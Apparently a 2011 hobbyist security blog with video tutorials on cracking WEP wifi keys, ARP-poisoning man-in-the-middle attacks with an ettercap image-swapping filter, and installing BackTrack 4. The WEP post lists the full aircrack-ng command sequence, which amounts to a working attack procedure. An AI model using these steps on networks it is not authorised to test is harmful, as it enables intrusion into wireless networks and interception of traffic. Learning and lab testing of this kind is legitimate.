Thursday, 24 February 2011

WEP Cracking

So next vid then, I decided to show how to crack a WEP key. WEP is very insecure and not too difficult to break.

So before everyone thinks "yay free wifi" don't start breaking in to your next doors wifi. Instead, try advising them that maybe they should think about changing their security.

A few prerequisites;
You will struggle to do this in a virtual box.
A lot of  laptop network cards will not work as there are driver issuses.
The network card must be able to switch to monitor mode and if it can also packet inject, it makes life easier.

So why is WEP so insecure? WEP uses the RC4 stream cipher, an initialisation vector and the WEP key.
The initialisation vectors(IV) is only 24bits long which is far to short. When packets are sent though the access point, the WEP key plus the IV are sent meaning that it is visible for all to see. Once the attack has seen or collected enough of these IV's its possible to work out the WEP key. By re-injecting the packets we are able to speed up this process.

The steps:

airmon-ng start wlan0
airodump-ng mon0
airodump-ng -c -w 2neon --bssid (bssid) mon0
aireplay-ng -1 0 -a (bssid) mon0
aireplay-ng -3 -b (bssid) mon0
aircrack-ng -b (bssid) (2neon-01.cap)

-c is the channel of the access point
-w is a text file name it anything aslong as at the end you call txt-01.cap

The video:
WEP cracking in BT

Again the mouse was gayed when recording this, will make sure that in the next vids that is sorted.

In the words of swaZ "we're cooking now".



Hi all.

So this is the first actual attack that we are going to do. It is a man in the middle type attack, this means we sit in between the router and the victim. Any traffic that goes between the two points first has to pass through my pc.

<Router>------<my pc>------<Victim>

This is done using ARP poisoning.

The ettercap filter is harmless and is essentially an IF statement.
The IF statement checks if the there are picture on the victims web traffic and replaces the pictures which the one that you specify.

The filter can be found here:
Irongeeks Ettercap Filter

The video can be found here:
Ettercap Filter Video

In the video, on the victim machine, I had to refresh as the first time firefox loads the page, it is pulled from the cache.


VBox Install BT4

OK, first off the video on this isn't fantastic.
For some reason when recording the mouse came out as a square :/

In this video I install backtrack 4 R2 in a virtualbox.

This is just a very simple install to the virtual box hard drive.
The install and tweaks are just how I like to set it up.

The steps:
Firstly creating a new machine in a virtual box, with hard drive and customised settings.
Next boot from the bt4 iso.
Select location and keyboard settings.
Select amount of disk space to use.
Once the install has finished reboot.

login: root
pass: toor
nano /root/.bash_profile
hit ctrl + x
and save it.
reboot again
system menu -> storage media-> open additions-> open terminal
apt-get -y update
apt-get -y upgrade

The video:
VB install of BT4

Not sure why it decided to play up on me :(


Friday, 18 February 2011

Live USB install

Right guys,

I decided to take it right from the basics so in this post and video I have downloaded and installed backtrack 4 R2.

This is a live install, which means if you make ANY changes, once you reboot they will be lost.

For those who don't know what Backtrack is, it's a custom distribution of Linux with the primary intention of penetration testing, exploiting and so on.
Found here

Please enjoy the video linked below any feedback would be fantastic and very useful.

Live install of BT4R2 to USB


P.S. Thanks to my friend Heliocentric who is providing the tunes.

2neon has a blog

So I have decided to create a blog.

The idea behind the blog is to keep people updated on security vids and my program development.

As all of this is kind of  new to me it may be a little tedious to start with so bare with me.

So, the videos are going to be using a backtrack virtual box and then a victim machine/virtual box.
This part I am familiar with, the recording will be using camtasia, which is something to look forward to :(

Finally I am trying to develop a program using the CUDA architecture, more on this later!